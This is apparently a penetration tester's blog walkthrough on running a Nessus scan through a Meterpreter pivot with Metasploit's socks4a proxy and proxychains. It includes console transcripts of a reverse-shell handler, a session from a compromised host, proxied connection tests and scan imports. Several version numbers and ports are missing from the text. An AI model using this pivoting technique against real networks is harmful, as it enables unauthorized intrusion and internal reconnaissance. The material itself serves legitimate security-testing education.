Earlier this year Mark Baggett wrote an article on running a Nessus scan through Meterpreter. It involved installing an SSH server on the compromised machine and then using it as a SOCKS4 proxy to forward the scan traffic through to the target machine (Nessus Scanning through a Metasploit Meterpreter Session). It was a great idea but I don't like installing tools on clients machines if I can avoid it so never got round to doing it on a test.
Recently Zate Berg added the Nessus plug-in to Metasploit to let you control a Nessus server from the Metasploit command line. Without thinking it through my initial reaction was "Great I can now scan through a Meterpreter pivot". Once I thought about it and read Carlos's article New Nessus Plug-In For Metasploit I realised that the Nessus server was still running on the attacker machine and so didn't have access to the tunnel.
After asking a few questions on various mailing lists egypt pointed me at the auxiliary/server/socksa module which would allow me to do the same as the SSH server but without having to install anything on the compromised machine. After a bit of playing, some partially successful scans and more questions to the list I got a completed scan through a Meterpreter pivot. The key seems to be that you need to be running at least Ruby (I'm running ) not as I originally tried, withouth it the proxy seems to get congested and locks up.
Below is a walk through of the steps I went through to get the scan. The actors in this play are:
- - The attacking machine
- - The compromised machine
- - The machine I want to scan
Check the tunnel is working. I don't speak SMB but if you do this and see the OK then the connection has been made and you can just enter some rubbish and hit return a few times, the other end will drop the connection pretty quickly. Pick a port you know, or expect, to be open on the target machine, SMB is usually a good choice for a Windows box.
robin@attacker metasploit $ ./msfconsole ___________ < DigiNinja > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || =[ metasploit v-dev [core: api:] + -- --=[ exploits - auxiliary + -- --=[ payloads - encoders - nops =[ svn r updated today () msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set lport lport => msf exploit(handler) > set lhost lhost => msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started reverse handler on 192.168.0.2:31337 [*] Starting the payload handler... msf exploit(handler) > [*] Sending stage ( bytes) to [*] Meterpreter session opened (192.168.0.2:31337 -> 192.168.0.80:24592) at 2010-10-22 10:38:18 + msf exploit(handler) > route add msf exploit(handler) > use auxiliary/server/socksa msf auxiliary(socksa) > run [*] Auxiliary module execution completed [*] Starting the socksa proxy server msf auxiliary(socksa) >
Before you start Nessus with proxychains you'll need to modify the proxychains config (/etc/proxychains.conf). In my default config I needed to add the following line to the end.
root@attacker sbin # proxychains nc ProxyChains- (http://proxychains.sf.net) |S-chain|-<>-127.0.0.1:1080-<><>-10.1.1.2:445-<><>-OK dummy...
And now start Nessus
Scans take a LONG time, with a default Nessus policy it took me seconds to scan the compromised machine, that is nearly an hour and a quarter so I've created a minimal policy to work with for this type of scanning. First we load the nessus module the connect to it, check the policies and finally fire off a scan.
root@attacker sbin # proxychains ./nessus-service -D
Now sit back for a LONG wait. You can check the status with nessus_scan_status
msf auxiliary(socksa) > load nessus [*] Nessus Bridge for Nessus .x [+] Type nessus_help for a command listing [*] Successfully loaded plugin: nessus msf auxiliary(socksa) > nessus_connect robin@localhost [+] Password: ... [*] Connecting to https://localhost:/ as robin [*] Authenticated msf auxiliary(socksa) > nessus_policy_list [+] Nessus Policy List ID Name Comments -- ---- -------- Minimal MS noping Web All msf auxiliary(socksa) > nessus_scan_new "Quick Windows" [*] Creating scan from policy number , called "Quick Windows" and scanning [*] Scan started. uid is 60625093-5ec-a-bc-afffaadbfaaee msf auxiliary(socksa) > nessus_scan_status [+] Running Scans Scan ID Name Owner Started Status Current Hosts Total Hosts ------- ---- ----- ------- ------ ------------- -----------60625093-5ec-a-bc-afffaadbfaaee Quick Windows robin 12:39 Oct 22 2010 running 1 [*] You can: [+] Import Nessus report to database : nessus_report_get <reportid> [+] Pause a nessus scan : nessus_scan_pause <scanid>
When it finall finishes you can check the results and load them into your Metasploit database
msf auxiliary(socksa) > nessus_scan_status [+] Running Scans Scan ID Name Owner Started Status Current Hosts Total Hosts ------- ---- ----- ------- ------ ------------- -----------60625093-5ec-a-bc-afffaadbfaaee Quick Windows robin 12:39 Oct 22 2010 running 1
So, there we have it, a full Nessus scan through a Meterpreter pivot with everything done in memory on the compromised machine. A very neat and tidy attack.
msf auxiliary(socksa) > db_connect msf.db [-] Note that sqlite is not supported due to numerous issues. [-] It may work, but don't count on it [*] Creating a new database file... [*] Successfully connected to the database [*] File: msf.db msf auxiliary(socks4a) > nessus_report_get 60625093-5ec-a-bc-af19ffaadbfaaee [*] importing 60625093-5ec-a-bc-af19ffaadbfaaee [*] Done! [+] Done msf auxiliary(socks4a) > db_hosts Hosts ===== address address6 arch comm comments created_at info mac name os_flavor os_lang os_name os_sp purpose state updated_at svcs vulns workspace ------- -------- ---- ---- -------- ---------- ---- --- ---- --------- ------- ------- ----- ------- ----- ---------- ---- ----- --------- 2010-10-22 14:09:22 UTC 00:13:3b:04:03:52 CORP_DC alive 2010-10-22 14:09:22 UTC 5 6 default